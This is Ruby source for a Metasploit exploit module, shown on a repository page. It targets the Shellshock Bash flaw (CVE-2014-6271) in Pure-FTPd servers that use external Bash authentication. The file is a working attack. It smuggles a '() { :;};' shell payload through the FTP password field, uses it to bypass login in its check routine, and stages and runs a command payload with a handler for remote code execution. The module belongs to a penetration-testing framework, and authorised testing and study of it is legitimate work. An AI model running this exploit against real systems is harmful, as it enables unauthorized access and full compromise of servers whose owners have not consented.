wchen-r7
11c1eb6c78
Most exploits don't check nil for generate_payload_exe, they just assume they will always have a payload. If the method returns nil, it ends up making debugging more difficult. Instead of checking nil one by one, we just raise.
115 lines
3.5 KiB
Ruby
115 lines
3.5 KiB
Ruby
##
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
require 'msf/core'
|
|
|
|
class Metasploit4 < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::Remote::Ftp
|
|
include Msf::Exploit::CmdStager
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)',
|
|
'Description' => %q(
|
|
This module exploits the Shellshock vulnerability, a flaw in how the Bash shell
|
|
handles external environment variables. This module targets the Pure-FTPd FTP
|
|
server when it has been compiled with the --with-extauth flag and an external
|
|
Bash script is used for authentication. If the server is not set up this way,
|
|
the exploit will fail, even if the version of Bash in use is vulnerable.
|
|
),
|
|
'Author' =>
|
|
[
|
|
'Stephane Chazelas', # Vulnerability discovery
|
|
'Frank Denis', # Discovery of Pure-FTPd attack vector
|
|
'Spencer McIntyre' # Metasploit module
|
|
],
|
|
'References' =>
|
|
[
|
|
['CVE', '2014-6271'],
|
|
['CWE', '94'],
|
|
['OSVDB', '112004'],
|
|
['EDB', '34765'],
|
|
['URL', 'https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc'],
|
|
['URL', 'http://download.pureftpd.org/pub/pure-ftpd/doc/README.Authentication-Modules']
|
|
],
|
|
'Payload' =>
|
|
{
|
|
'DisableNops' => true,
|
|
'Space' => 2048
|
|
},
|
|
'Targets' =>
|
|
[
|
|
[ 'Linux x86',
|
|
{
|
|
'Platform' => 'linux',
|
|
'Arch' => ARCH_X86,
|
|
'CmdStagerFlavor' => :printf
|
|
}
|
|
],
|
|
[ 'Linux x86_64',
|
|
{
|
|
'Platform' => 'linux',
|
|
'Arch' => ARCH_X86_64,
|
|
'CmdStagerFlavor' => :printf
|
|
}
|
|
]
|
|
],
|
|
'DefaultOptions' =>
|
|
{
|
|
'PrependFork' => true
|
|
},
|
|
'DefaultTarget' => 0,
|
|
'DisclosureDate' => 'Sep 24 2014'))
|
|
register_options(
|
|
[
|
|
Opt::RPORT(21),
|
|
OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin'])
|
|
], self.class)
|
|
deregister_options('FTPUSER', 'FTPPASS')
|
|
end
|
|
|
|
def check
|
|
# this check method tries to use the vulnerability to bypass the login
|
|
username = rand_text_alphanumeric(rand(20) + 1)
|
|
random_id = (rand(100) + 1)
|
|
command = "echo auth_ok:1; echo uid:#{random_id}; echo gid:#{random_id}; echo dir:/tmp; echo end"
|
|
if send_command(username, command) =~ /^2\d\d ok./i
|
|
disconnect
|
|
return CheckCode::Safe if banner !~ /pure-ftpd/i
|
|
|
|
command = "echo auth_ok:0; echo end"
|
|
if send_command(username, command) =~ /^5\d\d login authentication failed/i
|
|
disconnect
|
|
return CheckCode::Vulnerable
|
|
end
|
|
end
|
|
disconnect
|
|
|
|
CheckCode::Safe
|
|
end
|
|
|
|
def execute_command(cmd, _opts)
|
|
cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
|
|
username = rand_text_alphanumeric(rand(20) + 1)
|
|
send_command(username, cmd)
|
|
end
|
|
|
|
def exploit
|
|
execute_cmdstager(linemax: 500)
|
|
handler
|
|
end
|
|
|
|
def send_command(username, cmd)
|
|
cmd = "() { :;}; #{datastore['RPATH']}/sh -c \"#{cmd}\""
|
|
connect
|
|
send_user(username)
|
|
password_result = send_pass(cmd)
|
|
disconnect
|
|
password_result
|
|
end
|
|
end
|